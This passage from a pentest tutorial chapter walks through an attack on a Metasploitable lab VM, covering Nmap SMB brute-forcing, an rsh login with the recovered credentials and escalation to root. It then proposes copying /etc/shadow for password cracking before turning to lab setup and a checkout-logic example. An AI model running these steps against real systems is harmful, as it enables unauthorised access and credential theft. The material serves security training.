
Reference
Details of each vulnerability, including countermeasures, the CVSS score and the vulnerability test script, can be viewed in the Solution field of the vulnerability details in the report or on the CVE's detail page.
The Solution field in the previous screenshot lists using SSH instead of the rexec service as one countermeasure.
Exploiting the discovered vulnerability
Using Nmap, we check whether account information usable with rexec can be obtained from SMB.
Note: the check of SMB vulnerabilities itself is omitted.
Since OS user names and SMB user names are often kept in sync,
we enumerate accounts with the Nmap NSE script 'smb-brute'.
┌──(kali㉿Kali)-[~]
└─$ sudo nmap -sV -p 445 -script smb-brute 172.17.0.2
Starting Nmap 7.94 ( https://nmap.org ) at 2025-11-08 13:59 UTC
Nmap scan report for metasploitable.vm (172.17.0.2)
Host is up (0.000033s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Host script results:
| smb-brute:
| msfadmin:msfadmin => Valid credentials
|_ user:user => Valid credentials
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.04 seconds
Two users and their passwords can be read off the Host script results.
We use them to connect to the rexec service (rsh).
┌──(kali㉿Kali)-[~]
└─$ rsh -l msfadmin 172.17.0.2
Last login: Sun Jul 16 21:04:01 EDT 2017 on tty1
Linux 32554753bfe5 4.13.0-21-generic #24-Ubuntu SMP Mon Dec 18 17:29:16 UTC 2017 x86_64
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ pwd
/home/msfadmin
msfadmin@metasploitable:~$ sudo su
[sudo] password for msfadmin:
root@metasploitable:/home/msfadmin#
Escalation to the privileged user also succeeds.
It is easy to imagine how this chains into the next attack: copy /etc/passwd and /etc/shadow and crack the passwords with a utility such as John the Ripper.
Note: password cracking is covered in section 6.5, "Exploiting authentication-based vulnerabilities".
6.2. Building your own web application lab
● Purpose of the lab environment
- Understand and verify web application vulnerabilities safely
- Practise injection and authentication flaws hands-on
● Recommended Linux distributions
Building the environment on one of the following is easy and recommended.
Kali Linux: the most popular distribution, and the one used in this article
Parrot OS: a distribution popular with pentesters and researchers
BlackArch Linux: a distribution bundling more than 1900 tool packages
6.3 Understanding business logic flaws
A business logic flaw is a flaw in the design itself.
Vulnerability scanners cannot detect such flaws, so they call for their own countermeasures.
- Example: manipulation of billing logic or loyalty point accrual
- Countermeasure: strict input validation and a tightly controlled processing flow
- OWASP's recommended attack tests and defenses for these flaws are here
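The billing and loyalty-point example above is easier to see in code, because every request involved is syntactically valid and nothing a scanner sends would trigger it. The following is an added example, not code from the article or from any real shop: a checkout that trusts client-supplied prices and quantities, beside one that takes prices from a server-side catalog and validates every line before computing the total and the points. The catalog, the 1-point-per-100-yen rate, the cap of 100 units per line and the function names are all constructed for this example.

```python
# Added example (not from the original article): a business logic flaw in a
# checkout, beside a version that enforces the rules server-side.

CATALOG = {"book": 1200, "pen": 300}   # server-side prices in yen (constructed)
MAX_QTY_PER_LINE = 100                 # sanity cap per order line (constructed)


def checkout_flawed(order: list) -> tuple:
    """Design flaw: price and quantity are taken straight from the request.

    A client can send price=1, or a negative quantity that turns the total into
    a credit, and loyalty points are still awarded from that total. Every
    request is well-formed, so no scanner flags it."""
    total = sum(item["price"] * item["qty"] for item in order)
    return total, total // 100


class OrderError(ValueError):
    """Raised when an order violates a business rule."""


def order_errors(order: list) -> list:
    """Validate every line against the server's rules and return all violations."""
    errors = []
    if not order:
        errors.append("order has no lines")
    for i, item in enumerate(order):
        sku, qty = item.get("sku"), item.get("qty")
        if sku not in CATALOG:
            errors.append(f"line {i}: unknown sku {sku!r}")
        # type() rather than isinstance() so that True/False are not accepted as 1/0
        if type(qty) is not int or not 1 <= qty <= MAX_QTY_PER_LINE:
            errors.append(f"line {i}: quantity must be an integer from 1 to {MAX_QTY_PER_LINE}")
    return errors


def checkout_hardened(order: list) -> tuple:
    """Reject invalid orders; price comes from the catalog (any 'price' key sent by
    the client is ignored) and points are derived from the validated total."""
    errors = order_errors(order)
    if errors:
        raise OrderError("; ".join(errors))
    total = sum(CATALOG[item["sku"]] * item["qty"] for item in order)
    return total, total // 100


if __name__ == "__main__":
    # Constructed requests: a refund via negative quantity, and a client-set price.
    credit_order = [{"sku": "book", "price": 1200, "qty": 1}, {"sku": "pen", "price": 300, "qty": -10}]
    cheap_order = [{"sku": "book", "price": 1, "qty": 1000}]
    print("flawed, negative qty:", checkout_flawed(credit_order))
    print("flawed, client price:", checkout_flawed(cheap_order))
    print("hardened, negative qty:", order_errors(credit_order))
    print("hardened, client price ignored:", checkout_hardened([{"sku": "book", "price": 1, "qty": 1}]))
```

The point of `order_errors` returning every violation rather than raising on the first is operational: logging the full list for rejected orders is how the business-logic abuse a scanner cannot see shows up in monitoring.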
Chapter summary
This chapter organized web application vulnerabilities systematically, covering understanding the HTTP/HTTPS protocol → the OWASP Top 10 → exercises in a lab environment → building your own web application lab → understanding business logic flaws.
- Flaws in session management and authentication, and missing input validation, lead directly to successful attacks
- Understanding the OWASP Top 10 and working out defenses against it is fundamental for a security professional
📍 Next time
The next article covers Chapter 6 from "6.4 Injection attacks" onward.